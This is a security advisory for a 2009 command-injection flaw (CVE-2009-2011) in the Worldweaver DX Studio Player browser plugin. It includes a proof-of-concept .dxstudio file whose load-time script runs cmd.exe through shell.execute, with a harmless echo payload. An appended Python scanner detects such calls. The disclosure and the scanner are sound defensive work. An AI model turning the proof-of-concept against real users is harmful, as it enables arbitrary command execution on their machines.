Worldweaver DX Studio Player Browser Plugin Remote Arbitrary Shell Command Injection Vulnerability
Release date: 2009-05-21
Last updated: 2009-05-26
Affected systems:
worldweaver Worldweaver DX Studio Player 3.0.29 0
Unaffected systems:
worldweaver Worldweaver DX Studio Player 3.0.22 0
worldweaver Worldweaver DX Studio Player 3.0.12 0
worldweaver Worldweaver DX Studio Player 3.0.29 1
Description:
BUGTRAQ ID: 35273
CVE ID: CVE-2009-2011
Worldweaver DX Studio is a development tool for advanced real-time 3D applications and games.
Worldweaver DX Studio Player contains a remote command injection vulnerability in its implementation; an attacker can exploit it to execute arbitrary shell commands within the affected application.
<*Source: Diego Juarez
Link: http://osvdb.org/show/osvdb/54969
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear the risk themselves!
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<dxstudio version="1.0.0" width="800" height="600" defaultscriptlanguage="javascript">
<display frame="yes" hidecursor="no" hideconsole="no" hidecontext="no" maxfps="100" unthrottled="no" priority="normal" syncrefresh="yes" changeresolution="no" userresize="yes" workarea="no" windowmask="no" src="" minplayerversion="1.0.0">
<loading console="yes" custom="no" custombackground="no" customlogo="yes" showversion="no">
<prop id="background" type="color" r="0" g="0" b="0" a="1" />
<logo src="" />
<customprogress />
</loading>
</display>
<script>
<!-- onInit runs when the player loads the document; the CDATA section below must close with "]]>" -->
<![CDATA[function onInit()
{
shell.execute("cmd.exe","/k cls|@echo this is wrong, very wrong.")
}]]>
</script>
<licenseinfo stamp="cgdaaaaa" />
<security>
<prop id="password" type="string" value="" />
<prop id="allowplayer" type="bool" state="no" />
<prop id="nocache" type="bool" state="yes" />
</security>
</dxstudio>
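As an added defender-side example, not part of the original advisory: a small scanner that parses a .dxstudio document, extracts each <script> body (CDATA included) and flags calls to shell.execute, the host-OS call the advisory's test case uses. The sample document is constructed here; if the XML is malformed (for instance an unterminated CDATA section) the scanner falls back to searching the raw text so the call is not silently missed.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample mirroring the shape of the advisory's test case (not the page's own file).
SAMPLE_DXSTUDIO = """<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<dxstudio version="1.0.0" defaultscriptlanguage="javascript">
<display frame="yes"><loading console="yes"><logo src="" /></loading></display>
<script><![CDATA[function onInit()
{
    shell.execute("cmd.exe", "/k cls|@echo constructed sample")
}]]></script>
<security><prop id="allowplayer" type="bool" state="no" /></security>
</dxstudio>
"""

# The host-OS call named in the advisory; tolerant of extra whitespace and case.
SHELL_CALL = re.compile(r"\bshell\s*\.\s*execute\s*\(", re.IGNORECASE)


def extract_scripts(document: str) -> list[str]:
    """Return the text of every <script> element in a .dxstudio document.

    On malformed XML (e.g. an unterminated CDATA section) treat the whole file
    as one script body so the raw-text search still runs. For untrusted input
    in production, parsing with defusedxml instead of the stdlib is advisable.
    """
    try:
        root = ET.fromstring(document.encode("utf-8"))
    except ET.ParseError:
        return [document]
    return [(el.text or "") for el in root.iter("script")]


def find_shell_calls(document: str) -> list[dict]:
    """Flag each shell.execute(...) call, with the enclosing function name for triage."""
    findings = []
    for idx, body in enumerate(extract_scripts(document)):
        for m in SHELL_CALL.finditer(body):
            # Innermost "function name(" declared before the call, if any.
            funcs = re.findall(r"function\s+(\w+)\s*\(", body[: m.start()])
            findings.append({
                "script_index": idx,
                "offset": m.start(),
                "function": funcs[-1] if funcs else None,
                "snippet": body[m.start(): m.start() + 60].splitlines()[0],
            })
    return findings


def is_suspicious(document: str) -> bool:
    return bool(find_shell_calls(document))


if __name__ == "__main__":
    for finding in find_shell_calls(SAMPLE_DXSTUDIO):
        print(finding)
```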
Recommendations:
Vendor patch:
worldweaver
-----------
The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's homepage:
http://www.worldweaver.com/